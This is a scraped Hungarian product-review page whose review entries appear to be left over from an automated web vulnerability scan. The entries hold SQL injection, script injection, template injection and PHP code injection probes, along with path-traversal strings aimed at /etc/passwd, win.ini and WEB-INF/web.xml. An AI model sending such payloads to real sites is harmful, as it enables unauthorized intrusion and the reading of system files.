-1" OR 2+170-170-1=0+0+0+1 --
dinwkegs 2020-08-15 19:26:42
Értékelés:
-1' OR 2+800-800-1=0+0+0+1 or 'Z54oN03S'='
qbljnqnm 2020-08-15 19:26:42
Értékelés:
Írj véleményt a termékről!<script>9Io1(9960)</script>
dinwkegs 2020-08-15 19:26:39
Értékelés:
-1' OR 2+122-122-1=0+0+0+1 --
dinwkegs 2020-08-15 19:26:37
Értékelés:
-1 OR 2+355-355-1=0+0+0+1
qbljnqnm 2020-08-15 19:26:35
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<WKQO9Q>A891P[!+!]</WKQO9Q>
dinwkegs 2020-08-15 19:26:34
Értékelés:
-1 OR 2+301-301-1=0+0+0+1 --
dinwkegs 2020-08-15 19:26:32
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
dinwkegs 2020-08-15 19:26:30
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
qbljnqnm 2020-08-15 19:26:27
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!<ScRiPt >9Io1(9223)</ScRiPt>
qbljnqnm 2020-08-15 19:26:20
Értékelés:
{{10000089*10000041}}
qbljnqnm 2020-08-15 19:26:01
Értékelés:
CWS000x
qbljnqnm 2020-08-15 19:25:46
Értékelés:
acux10618
qbljnqnm 2020-08-15 19:25:37
Értékelés:
acu2879<s1﹥s2ʺs3ʹuca2879
qbljnqnm 2020-08-15 19:25:23
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!9684396
WEB-INF\web.xml 2020-08-15 19:25:19
Értékelés:
Írj véleményt a termékről!
qbljnqnm 2020-08-15 19:25:04
Értékelés:
'"()&%<acx><ScRiPt >9Io1(9629)</ScRiPt>
WEB-INF/web.xml 2020-08-15 19:25:02
Értékelés:
Írj véleményt a termékről!
qbljnqnm 2020-08-15 19:24:53
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!'"()&%<acx><ScRiPt >9Io1(9433)</ScRiPt>
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 2020-08-15 19:24:46
Értékelés:
Írj véleményt a termékről!
..\..\..\..\..\..\..\..\windows\win.ini 2020-08-15 19:24:43
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:24:42
Értékelés:
relrgxqm 2020-08-15 19:24:40
Értékelés:
................windowswin.ini 2020-08-15 19:24:39
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:24:38
Értékelés:
JyI=
relrgxqm 2020-08-15 19:24:36
Értékelés:
@@TO7UJ
../../../../../../../../../../windows/win.ini.jpg 2020-08-15 19:24:33
Értékelés:
Írj véleményt a termékről!
C:\WINDOWS\system32\drivers\etc\hosts 2020-08-15 19:24:31
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:24:30
Értékelés:
1
../../../../../../../../../../windows/win.ini 2020-08-15 19:24:29
Értékelés:
Írj véleményt a termékről!
WEB-INF\web.xml 2020-08-15 19:24:26
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:24:25
Értékelés:
\
relrgxqm 2020-08-15 19:24:24
Értékelés:
1'"
xmdmrgmt 2020-08-15 19:24:24
Értékelés:
Írj véleményt a termékről!
/WEB-INF/web.xml 2020-08-15 19:24:23
Értékelés:
Írj véleményt a termékről!
dinwkegs 2020-08-15 19:24:22
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:24:21
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
dinwkegs 2020-08-15 19:24:20
Értékelés:
Írj véleményt a termékről!
WEB-INF/web.xml 2020-08-15 19:24:19
Értékelés:
Írj véleményt a termékről!
/\../\../\../\../\../\../\../etc/passwd 2020-08-15 19:24:14
Értékelés:
Írj véleményt a termékről!
file:///etc/passwd 2020-08-15 19:24:10
Értékelés:
Írj véleményt a termékről!
fvwulyeh 2020-08-15 19:24:06
Értékelés:
Írj véleményt a termékről!
.. 2020-08-15 19:24:00
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:23:58
Értékelés:
Írj véleményt a termékről!
{{9999855*10000078}} 2020-08-15 19:23:56
Értékelés:
Írj véleményt a termékről!
%2fetc%2fpasswd 2020-08-15 19:23:41
Értékelés:
Írj véleményt a termékről!
/etc/passwd 2020-08-15 19:23:37
Értékelés:
Írj véleményt a termékről!
acux3906 2020-08-15 19:23:35
Értékelés:
Írj véleményt a termékről!
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 2020-08-15 19:23:32
Értékelés:
Írj véleményt a termékről!
acu10217<s1﹥s2ʺs3ʹuca10217 2020-08-15 19:23:22
Értékelés:
Írj véleményt a termékről!
../../../../../../../../../../etc/passwd.jpg 2020-08-15 19:23:19
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:23:13
Értékelés:
Írj véleményt a termékről!
ojqsggnh9939166 2020-08-15 19:23:12
Értékelés:
Írj véleményt a termékről!
2020-08-15 19:23:09
Értékelés:
Írj véleményt a termékről!
ubqbqykl 2020-08-15 19:23:09
Értékelés:
<!--
vjhbkwpa 2020-08-15 19:23:07
Értékelés:
cordyceps-sinensis/.
vjhbkwpa 2020-08-15 19:23:05
Értékelés:
cordyceps-sinensis
ubqbqykl 2020-08-15 19:23:05
Értékelés:
'"
../../../../../../../../../../etc/passwd 2020-08-15 19:23:04
Értékelés:
Írj véleményt a termékről!
ojqsggnh'"()&% 2020-08-15 19:23:04
Értékelés:
Írj véleményt a termékről!
2020-08-15 19:23:04
Értékelés:
Írj véleményt a termékről!
vjhbkwpa 2020-08-15 19:23:01
Értékelés:
cordyceps-sinensis
JyI= 2020-08-15 19:23:00
Értékelés:
Írj véleményt a termékről!
suykewut 2020-08-15 19:22:58
Értékelés:
Írj véleményt a termékről!
@@pdwGF 2020-08-15 19:22:54
Értékelés:
Írj véleményt a termékről!
suykewut 2020-08-15 19:22:53
Értékelés:
Írj véleményt a termékről!
vjhbkwpa 2020-08-15 19:22:49
Értékelés:
%c3%8drj%20v%c3%a9lem%c3%a9nyt%20a%20term%c3%a9kr%c5%91l!
1 2020-08-15 19:22:47
Értékelés:
Írj véleményt a termékről!
ojqsggnh 2020-08-15 19:22:45
Értékelés:
Írj véleményt a termékről!
suykewut 2020-08-15 19:22:40
Értékelés:
Írj véleményt a termékről!
\ 2020-08-15 19:22:39
Értékelés:
Írj véleményt a termékről!
ojqsggnh 2020-08-15 19:22:38
Értékelés:
Írj véleményt a termékről!
suykewut 2020-08-15 19:22:37
Értékelés:
Írj véleményt a termékről!
1'" 2020-08-15 19:22:34
Értékelés:
Írj véleményt a termékről!
suykewut 2020-08-15 19:22:33
Értékelés:
Írj véleményt a termékről!
njxykdpj 2020-08-15 19:22:32
Értékelés:
${@print(md5(acunetix_wvs_security_test))}\
ojqsggnh 2020-08-15 19:22:28
Értékelés:
Írj véleményt a termékről!
suykewut 2020-08-15 19:22:28
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:22:28
Értékelés:
Írj véleményt a termékről!
vjhbkwpa 2020-08-15 19:22:28
Értékelés:
Írj véleményt a termékről!
relrgxqm 2020-08-15 19:22:25
Értékelés:
Írj véleményt a termékről!
igeomssk 2020-08-15 19:22:24
Értékelés:
Írj véleményt a termékről!